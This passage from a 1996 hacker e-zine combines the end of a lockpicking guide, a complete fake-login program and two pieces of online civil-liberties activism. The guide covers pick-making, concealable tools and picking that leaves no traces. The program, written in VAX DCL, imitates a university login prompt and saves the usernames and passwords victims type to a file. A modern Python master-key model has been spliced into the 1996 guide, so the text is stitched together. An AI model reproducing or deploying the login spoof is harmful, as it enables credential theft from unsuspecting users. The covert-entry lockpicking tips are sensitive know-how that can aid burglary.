the bevel. Once that driver is free, the bottom plate can slide
and the right driver may bind on its bevel.
If you encounter a lock with beveled plug holes, and all
the pins appear to be set but the lock is not opening, you
should reduce torque and continue scrubbing over the pins. The
reduced torque will make it easier to push the drivers off the
bevels. If pins unset when you reduce the torque, try increasing
the torque and picking pressure. The problem with increasing the
force is that you may jam some key pins into the hull.
9.9 Mushroom Driver Pins
A general trick that lock makers use to make picking harder
is to modify the shape of the driver pin. The most popular
shapes are mushroom, spool and serrated; see Figure 9.7. The
purpose of these shapes is to cause the pins to false set low.
These drivers stop a picking technique called vibration picking
(see Section 9.12), but they only slightly complicate scrubbing
and one-pin-at-a-time picking (see Chapter 4).
If you pick a lock and the plug stops turning after a few
degrees and none of the pins can be pushed up any further, then
you know that the lock has modified drivers. Basically, the lip
of the driver has caught at the sheer line. See the bottom of
Figure 9.7. Mushroom and spool drivers are often found in
Russwin locks, and locks that have several spacers for master
keying.
You can identify the positions with the mushroom drivers by
applying a light torque and pushing up on each pin. The pins
with mushroom drivers will exhibit a tendency to bring the plug
back to the fully locked position. By pushing the key pin up you
are pushing the flat top of the key pin against the tilted
bottom of the mushroom driver. This causes the driver to
straighten up which in turn causes the plug to unrotate. You can
use this motion to identify the columns that have mushroom
drivers. Push those pins up to the sheer line; even if you lose some
of the other pins in the process they will be easier to re-pick
than the pins with mushroom drivers. Eventually all the pins
will be correctly set at the sheer line.
One way to identify all the positions with mushroom drivers
is to use the flat of your pick to push all the pins up about
halfway. This should put most of the drivers in their cockable
position and you can feel for them.
To pick a lock with modified drivers, use a lighter torque
and heavier pressure. You want to err on the side of pushing
the key pins too far into the hull. In fact, another way to pick
these locks is to use the flat side of your pick to push the
pins up all the way, and apply very heavy torque to hold them
there. Use a scrubbing action to vibrate the key pins while you
slowly reduce the torque. Reducing the torque reduces the
binding friction on the pins. The vibration and spring force
cause the key pins to slide down to the sheer line.
The key to picking locks with modified drivers is
recognizing incorrectly set pins. A mushroom driver set on its
lip will not have the springy give of a correctly set driver.
Practice recognizing the difference.
9.10 Master Keys
Many applications require keys that open only a single lock
and keys that open a group of locks. The keys that open a single
lock are called "change keys" and the keys that open multiple
locks are called "master keys." To allow both the change key and
the master key to open the same lock, a locksmith adds an extra
pin called a "spacer" to some of the pin columns. See Figure
9.8. The effect of the spacer is to create two gaps in the pin
column that could be lined up with the sheer line. Usually the
change key aligns the top of the spacer with the sheer line, and
the master key aligns the bottom of the spacer with the sheer
line (the idea is to prevent people from filing down a change
key to get a master key). In either case the plug is free to
rotate.
In general, spacers make a lock easier to pick. They
increase the number of opportunities to set each pin, and they
make it more likely that the lock can be opened by setting all
the pins at about the same height. In most cases only two or
three positions will have spacers. You can recognize a position
with a spacer by the two clicks you feel when the pin is pushed
down. If the spacer has a smaller diameter than the driver and
key pins, then you will feel a wide springy region because the
spacer will not bind as it passes through the sheer line. It is
more common for the spacer to be larger than the driver pin. You
can recognize this by an increase in friction when the spacer
passes through the sheer line. Since the spacer is larger than
the driver pin, it will also catch better on the plug. If you
push the spacer further into the hull, you will feel a strong
click when the bottom of the spacer clears the sheer line.
Thin spacers can cause serious problems. If you apply heavy
torque and the plug has beveled holes, the spacer can twist and
jam at the sheer line. It is also possible for the spacer to
fall into the keyway if the plug is rotated 180 degrees. See
Section 9.11 for the solution to this problem.
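The spacer geometry of Section 9.10 is easy to put into code. What follows is an added example, not part of the MIT Guide; the depth scale, the SHEAR_LINE value and the five-column lock are constructed. It also carries the text's point one step further: each spaced column offers two heights that line up with the sheer line, so the lock turns not only for the change key and the master key but for every "cross key" that mixes the two heights across columns, and a change key cannot be filed into a master key because the master cut is the shallower one.

```python
"""Master keying modelled as extra pin boundaries (Section 9.10).

Added example, not part of the MIT Guide.  Units are a constructed depth
scale: SHEAR_LINE is the height of the plug/hull boundary above the bottom
of a pin stack, and a key "lift" is how far a cut raises the stack.
"""
from itertools import product
from typing import List, Sequence, Tuple

SHEAR_LINE = 10  # constructed value, not a real manufacturer's spec

# A column is the sorted tuple of lifts at which some pin boundary sits
# exactly on the shear line, i.e. the cut depths that let the plug turn.
Column = Tuple[int, ...]


def column_from_stack(key_pin: int, spacer: int = 0) -> Column:
    """Lifts that open one column, given its pin stack.

    Boundaries are measured from the bottom of the stack: the top of the
    key pin is at key_pin; a spacer of thickness `spacer` adds a second
    boundary at key_pin + spacer (its top).  A boundary at height b reaches
    the shear line when the key lifts the stack by SHEAR_LINE - b.  The
    higher boundary (top of spacer) needs the smaller lift, so the change
    key has the deeper cut and the master key the shallower one.
    """
    if key_pin <= 0 or spacer < 0:
        raise ValueError("key pin must be positive, spacer non-negative")
    boundaries = [key_pin] + ([key_pin + spacer] if spacer else [])
    if max(boundaries) > SHEAR_LINE:
        raise ValueError("pin stack is taller than the shear line")
    return tuple(sorted({SHEAR_LINE - b for b in boundaries}))


def opens(lock: Sequence[Column], bitting: Sequence[int]) -> bool:
    """A key opens the lock iff every column has a boundary at the shear line."""
    return len(bitting) == len(lock) and all(
        lift in col for col, lift in zip(lock, bitting)
    )


def change_key(lock: Sequence[Column]) -> Tuple[int, ...]:
    """Deepest cut per column: top of the spacer (where present) at the shear line."""
    return tuple(col[0] for col in lock)


def master_key(lock: Sequence[Column]) -> Tuple[int, ...]:
    """Shallowest cut per column: bottom of the spacer at the shear line."""
    return tuple(col[-1] for col in lock)


def all_opening_keys(lock: Sequence[Column]) -> List[Tuple[int, ...]]:
    """Every bitting that turns the plug.

    Each spaced column contributes two usable lifts, so besides the change
    and master keys the lock also accepts every "cross key" that mixes
    change-height and master-height cuts across columns.
    """
    return sorted(product(*lock))


def can_file_into(src: Sequence[int], dst: Sequence[int]) -> bool:
    """Filing only removes metal: a cut can get deeper (lift smaller), never shallower."""
    return len(src) == len(dst) and all(d <= s for s, d in zip(src, dst))


# Constructed five-column lock with spacers in columns 1 and 3.
LOCK: List[Column] = [
    column_from_stack(key_pin=6),
    column_from_stack(key_pin=5, spacer=2),
    column_from_stack(key_pin=3),
    column_from_stack(key_pin=4, spacer=3),
    column_from_stack(key_pin=7),
]

if __name__ == "__main__":
    keys = all_opening_keys(LOCK)
    print("change key :", change_key(LOCK))
    print("master key :", master_key(LOCK))
    print("keys that open the lock:", len(keys))  # 4: change, master, 2 cross keys
    for k in keys:
        tag = ("change" if k == change_key(LOCK)
               else "master" if k == master_key(LOCK) else "cross")
        print("  ", k, tag)
    print("change key filed into master?",
          can_file_into(change_key(LOCK), master_key(LOCK)))  # False
```

With two spaced columns the lock accepts four distinct bittings; with k spaced columns it accepts 2^k, which is the whole of the risk a master-keyed system trades for convenience.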
9.11 Driver or Spacer Enters Keyway
Figure 9.9 shows how a spacer or driver pin can enter the
keyway when the plug is rotated 180 degrees. You can prevent
this by placing the flat side of your pick in the bottom of the
keyway BEFORE you turn the plug too far. If a spacer or driver
does enter the keyway and prevent you from turning the plug, use
the flat side of your pick to push the spacer back into the
hull. You may need to use the torque wrench to relieve any sheer
force that is binding the spacer or driver. If that doesn't
work, try raking over the drivers with the pointed side of your
pick. If a spacer falls into the keyway completely, the only
option is to remove it. A hook shaped piece of spring steel
works well for this, though a bent paperclip will work just as
well unless the spacer becomes wedged.
9.12 Vibration Picking
Vibration picking works by creating a large gap between the
key and driver pins. The underlying principle is familiar to
anyone who has played pool. When the cue ball strikes another
ball squarely, the cue ball stops and the other ball heads off
with the same speed and direction as the cue ball. Now imagine
a device that kicks the tips of all the key pins. The key pins
would transfer their momentum to the driver pins which would fly
up into the hull. If you are applying a light torque when this
happens, the plug will rotate when all the drivers are above the
sheer line.
9.13 Disk Tumblers
The inexpensive locks found on desks use metal disks
instead of pins. Figure 9.10 shows the basic workings of these
locks. The disks have the same outline but differ in the
placement of the rectangular cut.
These locks are easy to pick with the right tools. Because
the disks are placed close together a half-round pick works
better than a half-diamond pick (see Figure A.1). You may also
need a torque wrench with a narrower head. Use moderate to heavy
torque.
Chapter 10
Final Remarks
Lockpicking is a craft, not a science. This document
presents the knowledge and skills that are essential to
lockpicking, but more importantly it provides you with models
and exercises that will help you study locks on your own. To
excel at lockpicking, you must practice and develop a style
which fits you personally. Remember that the best technique is
the one that works best for you.
Appendix A
Tools
This appendix describes the design and
construction of lockpicking tools.
A.1 Pick Shapes
Picks come in several shapes and sizes. Figure A.1 shows
the most common shapes. The handle and tang of a pick are the
same for all picks. The handle must be comfortable and the tang
must be thin enough to avoid bumping pins unnecessarily. If the
tang is too thin, then it will act like a spring and you will
lose the feel of the tip interacting with the pins. The shape
of the tip determines how easily the pick passes over the pins
and what kind of feedback you get from each pin.
The design of a tip is a compromise between the ease of
insertion, ease of withdrawal and feel of the interaction. The
half diamond tip with shallow angles is easy to insert and
remove, so you can apply pressure when the pick is moving in
either direction. It can quickly pick a lock that has little
variation in the lengths of the key pins. If the lock requires a
key that has a deep cut between two shallow cuts, the pick may
not be able to push the middle pin down far enough. The half
diamond pick with steep angles could deal with such a lock, and
in general steep angles give you better feedback about the pins.
Unfortunately, the steep angles make it harder to move the pick
in the lock. A tip that has a shallow front angle and a steep
back angle works well for Yale locks.
The half round tip works well in a disk tumbler lock. See
Section 9.13. The full diamond and full round tips are useful
for locks that have pins at the top and bottom of the keyway.
The rake tip is designed for picking pins one by one. It
can also be used to rake over the pins, but the pressure can
only be applied as the pick is withdrawn. The rake tip allows
you to carefully feel each pin and apply varying amounts of
pressure. Some rake tips are flat or dented on the top to make
it easier to align the pick on the pin. The primary benefit of
picking pins one at a time is that you avoid scratching the
pins. Scrubbing scratches the tips of the pins and the keyway,
and it spreads metal dust throughout the lock. If you want to
avoid leaving traces, you must avoid scrubbing.
The snake tip can be used for scrubbing or picking. When
scrubbing, the multiple bumps generate more action than a
regular pick. The snake tip is particularly good at opening
five-pin household locks. When a snake tip is used for picking,
it can set two or three pins at once. Basically, the snake pick
acts like a segment of a key which can be adjusted by lifting
and lowering the tip, by tilting it back and forth, and by using
either the top or bottom of the tip. You should use moderate to
heavy torque with a snake pick to allow several pins to bind at
the same time. This style of picking is faster than using a rake
and it leaves just as little evidence.
A.2 Street Cleaner Bristles
The spring steel bristles used on street cleaners make
excellent tools for lockpicking. The bristles have the right
thickness and width, and they are easy to grind into the desired
shape. The resulting tools are springy and strong. Section A.3
describes how to make tools that are less springy.
The first step in making tools is to sand off any rust on
the bristles. Coarse grit sandpaper works fine, as does a steel
wool cleaning pad (not copper wool). If the edges or tip of the
bristle are worn down, use a file to make them square.
A torque wrench has a head and a handle as shown in Figure
A.2. The head is usually 1/2 to 3/4 of an inch long and the
handle varies from 2 to 4 inches long. The head and the handle
are separated by a bend that is about 80 degrees. The head must
be long enough to reach over any protrusions (such as a
grip-proof collar) and firmly engage the plug. A long handle allows
delicate control over torque, but if it is too long, it will
bump against the door frame. The handle, head and bend angle can
be made quite small if you want to make tools that are easy to
conceal (e.g., in a pen, flashlight or belt buckle). Some torque
wrenches have a 90 degree twist in the handle. The twist makes
it easy to control the torque by controlling how far the handle
has been deflected from its rest position. The handle acts as a
spring which sets the torque. The disadvantage of this method of
setting the torque is that you get less feedback about the
rotation of the plug. To pick difficult locks you will need to
learn how to apply a steady torque via a stiff handled torque
wrench.
The width of the head of a torque wrench determines how
well it will fit the keyway. Locks with narrow keyways (e.g.
desk locks) need torque wrenches with narrow heads. Before
bending the bristle, file the head to the desired width. A
general purpose wrench can be made by narrowing the tip (about
1/4 inch) of the head. The tip fits small keyways while the rest
of the head is wide enough to grab a normal keyway.
The hard part of making a torque wrench is bending the
bristle without cracking it. To make the 90 degree handle twist,
clamp the head of the bristle (about one inch) in a vise and use
pliers to grasp the bristle about 3/8 of an inch above the vise.
You can use another pair of pliers instead of a vise. Apply a 45
degree twist. Try to keep the axis of the twist lined up with
the axis of the bristle. Now move the pliers back another 3/8
inch and apply the remaining 45 degrees. You will need to twist
the bristle more than 90 degrees in order to set a permanent 90
degree twist.
To make the 80 degree head bend, lift the bristle out of
the vise by about 1/4 inch (so 3/4 inch is still in the vise).
Place the shank of a screw driver against the bristle and bend
the spring steel around it about 90 degrees. This should set a
permanent 80 degree bend in the metal. Try to keep the axis of
the bend perpendicular to the handle. The screwdriver shank
ensures that the radius of curvature will not be too small. Any
rounded object will work (e.g. drill bit, needle nose pliers, or
a pen cap). If you have trouble with this method, try grasping
the bristle with two pliers separated by about 1/2 inch and
bend. This method produces a gentle curve that won't break the
bristle.
A grinding wheel will greatly speed the job of making a
pick. It takes a bit of practice to learn how to make smooth
cuts with a grinding wheel, but it takes less time to practice
and make two or three picks than it does to hand file a single
pick. The first step is to cut the front angle of the pick. Use
the front of the wheel to do this. Hold the bristle at 45
degrees to the wheel and move the bristle side to side as you
grind away the metal. Grind slowly to avoid overheating the
metal, which makes it brittle. If the metal changes color (to
dark blue), you have overheated it, and you should grind away
the colored portion. Next, cut the back angle of the tip using
the corner of the wheel. Usually one corner is sharper than the
other, and you should use that one. Hold the pick at the desired
angle and slowly push it into the corner of the wheel. The side
of the stone should cut the back angle. Be sure that the tip of
the pick is supported. If the grinding wheel stage is not close
enough to the wheel to support the tip, use needle nose pliers
to hold the tip. The cut should pass through about 2/3 of the
width of the bristle. If the tip came out well, continue.
Otherwise break it off and try again. You can break the bristle
by clamping it into a vise and bending it sharply.
The corner of the wheel is also used to grind the tang of
the pick. Put a scratch mark to indicate how far back the tang
should go. The tang should be long enough to allow the tip to
pass over the back pin of a seven pin lock. Cut the tang by
making several smooth passes over the corner. Each pass starts
at the tip and moves to the scratch mark. Try to remove less
than a 1/16th of an inch of metal with each pass. I use two
fingers to hold the bristle on the stage at the proper angle
while my other hand pushes the handle of the pick to move the
tang along the corner. Use whatever technique works best for
you.
Use a hand file to finish the pick. It should feel smooth
if you run a finger nail over it. Any roughness will add noise
to the feedback you want to get from the lock.
The outer sheath of phone cable can be used as a handle for
the pick. Remove three or four of the wires from a length of
cable and push it over the pick. If the sheath won't stay in
place, you can put some epoxy on the handle before pushing the
sheath over it.
A.3 Bicycle Spokes
An alternative to making tools out of street cleaner
bristles is to make them out of nails and bicycle spokes. These
materials are easily accessible and when they are heat treated,
they will be stronger than tools made from the bristles.
A strong torque wrench can be constructed from an 8-penny
nail (about .1 inch diameter). First heat up the point with a
propane torch until it glows red, slowly remove it from the
flame, and let it air cool; this softens it. The burner of a gas
stove can be used instead of a torch. Grind it down into the
shape of a skinny screwdriver blade and bend it to about 80
degrees. The bend should be less than a right angle because some
lock faces are recessed behind a plate (called an escutcheon)
and you want the head of the wrench to be able to reach about
half an inch into the plug. Temper (harden) the torque wrench by
heating to bright orange and dunking it into ice water. You will
wind up with a virtually indestructible bent screwdriver that
will last for years under brutal use.
Bicycle spokes make excellent picks. Bend one to the shape
you want and file the side of the business end flat such that
it's strong in the vertical and flexy in the horizontal
direction. Try a right-angle hunk about an inch long for a
handle. For smaller picks, which you need for those really tiny
keyways, find any large-diameter spring and unbend it. If you're
careful, you don't have to play any metallurgical games.
A.4 Brick Strap
For perfectly serviceable key blanks that you can't
otherwise find at the store, use the metal strap they wrap
around bricks for shipping. It's wonderfully handy stuff for
just about anything you want to manufacture. To get around side
wards in the keyway, you can bend the strap lengthwise by
clamping it in a vise and tapping on the protruding part to bend
the piece to the required angle.
Brick strap is very hard. It can ruin a grinding wheel or
key cutting machine. A hand file is the recommended tool for
milling brick strap.
-= END OF FILE =-
* Origin: Combat Arms BBS - Portland, OR - (503) 221-1777 (1:105/68)
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #6, File #5 of 8
Yet Another Login Spoof
Brent Barnhill
From 0211065@ACAD.NWMISSOURI.EDU Wed Jan 24 13:08:04 1996
Date: Mon, 22 Jan 1996 16:52:08 -0600 (CST)
From: "HI JUST THOUGHT I WOULD DROP BY" <0211065@ACAD.NWMISSOURI.EDU>
To: mrs3691@hertz.njit.edu
Subject: fake login program
Hey there. I heard that you are the person to contact to submit hacker's
programs. Well, I just made a wonderful fake login program in DCL. The program
is supposed to work if someone lets someone else use my account to telnet to my
school and login. Well, here it is:
$ wait 00:00:02
$ set message/id/sev/facil/text
$ W :== Write sys$output
$ TI :== Type sys$input
$ TI
Trying Connected to ACAD.NWMISSOURI.EDU.
$ W ""
$ W ""
$ W ""
$ TI
Welcome to Northwest Missouri State University.
Current access is to a VAX Cluster on Node S0.
Missouri statutes prohibit computer tampering.
$ W ""
$ read/prompt = "Username: " sys$command username
$ set term/noecho
$ read/prompt = "Password: " sys$command password
$ set term/echo
$ open/write log d3:[211065]log.txt
$ write log username, " "
$ write log password, " "
$ close log
$ inquire/nopunctuation sel "User authorization failure.[26D"
$ if sel .eqs. "" then goto asdf
$ asdf:
$ read/prompt = "Username: " sys$command username
$ set term/noecho
$ read/prompt = "Password: " sys$command password
$ set term/echo
$ open/write log d3:[211065]log.txt
$ write log username, " "
$ write log password, " "
$ close log
$ inquire/nopunctuation sel "User authorization failure.[26D"
$ if sel .eqs. "" then goto klll
$ klll:
$ read/prompt = "Username: " sys$command username
$ set term/noecho
$ read/prompt = "Password: " sys$command password
$ set term/echo
$ open/write log d3:[211065]log.txt
$ write log username, " "
$ write log password, " "
$ close log
$ TI
User authorization failure
$ W ""
$ TI
Connection closed by Foreign Host
$ bye
Here is my wonderful info:
Brent Barnhill or "Hey"
(816) 562-6237
314 Dieterich http://www.nwmissouri.edu/~0211065
PLEASE FINGER ME SINCE I HAVE "TONS" OF FREE COOL STUFF!!!
Have a wonderful day!
Brent :)
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #6, File #6 of 8
A Request for Action
Jim Warren
[I'm sending this to a journalists listserv and to various personal
contacts in the press, as well as to my GovAccess subscribers. It is
highly time-sensitive.
Please accept this as a personal note. Please RECIRCULATE it, widely.]
Folks,
There's a time to read and contemplate.
There's a time to discuss and debate and haggle -- with peers who have
about the equal power as you have over the nation's future.
And there's a time to ACT -- to DO SOMETHING! To IMPROVE OUR POTENTIAL FUTURE.
Please
I urge you I implore you --
Act NOW.
It is obvious that we MUST act. We MUST move our nation's "leaders" --
sometimes fearfully kicking and screaming -- into the Information Age. We
must demand that those who wish to lead us must drive the "information
superhighways" that they are so zealously, piously -- and *ignorantly* --
attempting to police.
We MUST make them aware of the net's power as a tool of freedom and
democracy -- and effective grassroots action -- before they destroy its
potential.
For they are endangering us all, through posturing stupidity and
self-righteous arrogance.
That we MUST act is obvious from numerous examples. To name just a few:
* The administrations' (plural) zealous, continuing suppression of
standardized personal privacy protection for communications and files --
via globally- published, freely-available robust cryptography; blockading
needed privacy for business and citizens -- who are now "presumed innocent"
*only* during trial; only *after* being arrested and indicted;
* Last year's half-billion-dollar wiretap law, that forces every telephone
company to make our nation wiretap-ready for whichever fascist first chooses
to abuse that awesome power;
* This year's successful efforts to make the government into our parent
and overseer -- a federal daddy censoring all that we say or see, if we
dare to use any "telecommunications device" (and it *doesn't* just
censor the net!);
* The just-passed Telecommunications Deform Act -- that grants so much
freedom to those giant corporations who paid so much to those who voted
freedom to create cartels, to price-gouge where they have functional
monopolies, to sell our electronic news media to unscrupulous foreigners,
and to allow whichever media giant has the most money to buy control of and
monopolize the print and broadcast news channels in any geographic area;
and
* The legislation by senior Republican Congressman Henry Hyde, just
reported in net email, that would allegedly classify all abortion
information -- *medical*, social or political -- as "obscene," prohibiting
its discussion using any telecomm device, including telephones and the net.
(And that's not as draconian as what other senior "leaders" have proposed!)
YOU -- each of us -- CAN help presidential candidates better understand the net:
PRESIDENTIAL CANDIDATES ONLINE DEBATE, NOW!
As one tiny step for those asking to "lead" us into the 21st Century and
the Information Age -- to help them understand the net's potential -- I
have invited presidential candidates to participate in a week of online
debate (requiring only a few minutes daily; from any place; at any time;
presumably/hopefully with their staff doing the typing). Each day, the
candidates themselves will question each other, followed by their
responses and then by rebuttals -- all of limited length, submitted within
agreed-upon daily time limits, with pointers to additional online
information if they desire.
As the most significant current target of opportunity, I proposed the
debate for the Republican primary's presidential candidates. Because the
driving force of their competition is likely to end after the Iowa caucuses
(2/12) and the New Hampshire primaries (2/20), I proposed that the debates
begin next Monday, Feb. 5th, and conclude Feb. 11th.
If we can set the precedent with the Republicans, now, then substantive
online presidential debates will be likely prior to next November's general
elections. If the primary debate doesn't happen now, it seems likely that
major presidential candidates will not debate online until the next
century!
MAJOR NATIONAL NEWS MEDIA COOPERATING
The U.S. NEWS & WORLD REPORT, Knight-Ridder's MERCURY CENTER at the SAN
JOSE MERCURY NEWS, and New Jersey's second-largest newspaper, the ASBURY
PARK PRESS, have all agreed to carry any substantive presidential debate on
their public websites, and others are likely. (As a data-point, Mercury
Center typically gets 300,000 to 400,000 hits per day, and tops 500,000 on
"hot" news days.)
Numerous reporters, columnists and editors with mainstream media have said
that they would cover any substantive online debate that included major
candidates. Today, Reuters carried a major story about the proposed debate,
and others will appear shortly in U.S. NEWS & WORLD REPORT and in the
NATIONAL JOURNAL -- among others.
THREE CANDIDATES HAVE ACCEPTED -- BUT FIVE OTHERS REMAIN UNCOMMITTED
Lugar, Taylor and Collins have already sent signed commitments to
participate. Another candidate said no; another said yes and signed --
then reneged (below).
The agreement is that the debate will occur only if there are at least four
candidates. And, unless at least one more "major" candidate joins the
debate, it's doubtful that the press will consider it substantive and worth
significant coverage.
The remaining candidates *must decide by NEXT MONDAY*!! Please -- help them:
ASK THOSE WHO WOULD BE OUR PRESIDENT TO PARTICIPATE IN OUR FUTURE -- NOW
The non-committed candidates will participate only if they believe that (1)
lots of people [voters] are interested, and (2) the press is likely to
cover it. (The press *will* cover it, *if* several of the "major"
candidates participate.) As a voter, please:
1. Phone, fax and email the candidates, NOW, asking them to participate
-- if they want us to believe they are competent to lead us into the
Information Age.
2. Email this message to every person you know who lives or works in
Iowa or New Hampshire (e.g., *all* the staff at the numerous computer
magazines in NH!).
Please - do it NOW!
Yes, the campaign managers *are* working day and night and through the weekend.
Let's demonstrate the power of the net -- before arrogance or stupidity
demolishes its power and potential. Thanks for reading.
--jim
Jim Warren, GovAccess list-owner/editor (jwarren@well.com)
Member, Freedom-of-Information Committee, Soc. of Prof. Journalists - Nor. Cal.
Advocate & columnist, MicroTimes, Government Technology, BoardWatch, etc.
345 Swett Rd., Woodside CA 94062; voice/415-851-7075; fax/<# upon request>
[puffery: John Dvorak Lifetime Achievement Award (1995); James Madison
Freedom-of-Information Award, Soc. of Professional Journalists - Nor.Cal.
(1994); Hugh Hefner First-Amendment Award, Playboy Foundation (1994);
Pioneer Award, Electronic Frontier Foundation (its first year, 1992);
founded the Computers, Freedom & Privacy confs, InfoWorld; blah blah blah :-).]
Lamar Alexander: 615-327-3350; fax/615-340-0397, Campaign Mgr Dan Pero
lamar@Nashville.net
http://www.lamar.com/~lamar/
Phil Gramm: 202-467-8600; fax/202-467-8696, Campaign Mgr Jeb Hensarling
info@gramm96.org
http://www.gramm96.com/
Pat Buchanan: 703-848-1996; fax/703-827-0592, Campaign Mgr Terry Jeffries
lmuller@iquest.com
http://www.buchanan.org/
Bob Dole: 202-414-6400; fax/202-408-9446, Campaign Mgr Scott Reed
[apparently no email except via webpage]
http://www.dole96.org/
Steve Forbes: 908-781-5111 [the best # I've found]; fax/908-781-6001
forbes@forbes96.com
http://www.forbes96.com/
Those who have committed to debate:
Dick Lugar: fax/317-931-4106, Mark Lubbers <== WILL debate!
rgl@iquest.net
http://www.iquest.com/lugar/
Charles Collins: 912-994-8219; fax/912-994-7995, George Gruner <== WILL debate!
[may be] http://computek.net/public/collins/collins.html
Morry Taylor: fax/515-264-7510, Campaign Mgr Bill Kenyon <== WILL debate!
TPresident@aol.com
http://www.webcom.com/~morry96/
Those who have declined or reneged (might be worth email or a call):
Bob Dornan: fax/703-644-5117, Campaign Mgr Terri Cobban <== "Yes," then "No."
[I have a staffer's email address, but I believe it's not public]
[may be] http://www.umr.edu/~sears/primary/dornan.html
Alan Keyes: 503-463-1818; fax/602-263-7790, Nat'l Polit.Dir George Uribe <== NO.
GeoUribe@aol.com
http://www.keyes.gocin.com/
Keyes campaign manager sent email saying, "I do like the concept and so
does Ambassador Keyes. Unfortunately we can't spare a week for a staffer to
service the program." (Yes, we spoke and I explained how online forums
operate, and how easily they can be done using minimal and flexible time.)
Dornan campaign manager Terri Cobban verbally agreed to debate, twice --
two days apart -- and they later faxed a written commitment, signed
explicitly by "Bob Dornan." But on Wednesday afternoon (1/31), Cobban
called and said they were cancelling. When I asked for a signed fax
confirming this, she said, "No, I feel a verbal statement is sufficient at
this time."
Mo' as it Is.
--jim
Jim Warren, GovAccess list-owner/editor (jwarren@well.com)
Advocate & columnist, MicroTimes, Government Technology, BoardWatch, etc.
345 Swett Rd., Woodside CA 94062; voice/415-851-7075; fax/<# upon request>
To add or drop GovAccess, email to Majordomo@well.com ('Subject' ignored)
with message: [un]subscribe GovAccess YourEmailAddress (insert your eaddr)
For brief description of GovAccess, send the message: info GovAccess
Past postings are at ftp.cpsr.org: /cpsr/states/california/govaccess
and by WWW at http://www.cpsr.org/cpsr/states/california/govaccess .
Also forwarded to USENET's comp.org.cpsr.talk by CPSR's Al Whaley.
May be copied & reposted except for any items that explicitly prohibit it.
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #6, File #7 of 8
Cyberspace Makes the Difference
Voter's Telecommunications Watch
FOR IMMEDIATE RELEASE FEBRUARY 1, 1996
Contact: Steven Cherry
(201) 596-2851
stc@vtw.org
Shabbir Safdar
(718) 596-2851
shabbir@vtw.org
New York, NY
RON WYDEN WINS SPECIAL OREGON SENATE ELECTION
INTERNET ACTIVIST GROUP CLAIMS
SHARE OF SUCCESS
Voter's Telecommunications Watch, an on-line civil liberties group
announced today that the closeness of the vote in Oregon's special
Senate election justified the attention given to the cyberspace vote by
the Wyden campaign. Wyden's 1% margin of victory represented fewer than
20,000 votes.
Wyden took pains to make his campaign accessible to Internet voters
through on-line appearances, an Internet account that answered voter
email promptly, by maintaining an active World Wide Web site, and by
being the first candidate in the 1996 election season to answer VTW's
Technology Pledge. The pledge consists of four questions that probe a
candidate's stand on the central cyberliberties issues of the day.
Wyden, currently serving in the House of Representatives, not only
answered all four Pledge questions in the affirmative, he was able to
point to a Congressional legislative record that supported those answers.
VTW and the Oregon on-line community widely circulated the answers of
three candidates to the pledge questionnaire, and received testimony from
many voters that the relative stands of the candidates on these
telecommunications issues determined their vote.
VTW looks forward to Wyden's contributions to telecommunications and
civil liberties issues shifting from the House to the Senate. It is also
encouraged that by helping to draw attention to the positions of
candidates throughout the 1996 elections, citizens involved in the
on-line world will make their voices heard in the voting booth.
Voters Telecommunications Watch is a volunteer organization, concentrating
on legislation as it relates to telecommunications and civil liberties.
VTW publishes a weekly BillWatch that tracks relevant legislation as it
progresses through Congress. It publishes periodic Alerts to inform the
public about immediate action it can take to protect its on-line civil
liberties and privacy.
The Wyden campaign can still be contacted on-line or off- at:
Wyden for Senate
Sue Castner, Press Representative
PO Box 3498, Portland, OR 97208
503-248-9567, fax: 503-248-9890
wyden@teleport.com
http://www.teleport.com/~wyden
More information about VTW can be found on-line at
gopher -p 1/vtw gopher.panix.com
www: http://www.vtw.org
or by writing to vtw@vtw.org. The press can call (718) 596-2851 or
contact:
Shabbir Safdar (shabbir@vtw.org)
Steven Cherry (stc@vtw.org)
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #6, File #8 of 8
The End
There it goes again. Another issue came and went, and 30 more days
must come and go before the next fix of Hackers can be injected into your
blood stream. If you need to talk to somebody before then, I should be on the
Defcon bridge now and then, and the 2600 voice BBS. As always, I'm at
mrs3691@hertz.njit.edu, (201) 565-9145, 621A Redwood Hall, 186 Bleeker St.,
Newark, NJ, 07103. The official web site is still
http://hertz.njit.edu/~mrs3691, and the official ftp site is still
infonexus.com.
In your lab, tinkering with the inner flesh of the phone system,
toying with the defense networks of foreign countries, are you frustrated
because your work is taken for granted by huge corporations who pay well but
offer none of that feeling of accomplishment and awe that you desire so much?
Then submit an article to Hackers, and receive the recognition you so deserve.
I haven't decided whether the no-prize will be all the parts necessary
to build a beige box that aren't included in a normal phone, or a real live
visit with an intelligent Bell Atlantic Operator. But you have to submit to
win! So hopefully next issue will be chock full of ideas for those of us with
way too much consumer electronics lying around, and not enough to do with it.
See you next month, and wherever you hack, may the ethic be with you.
- Revolution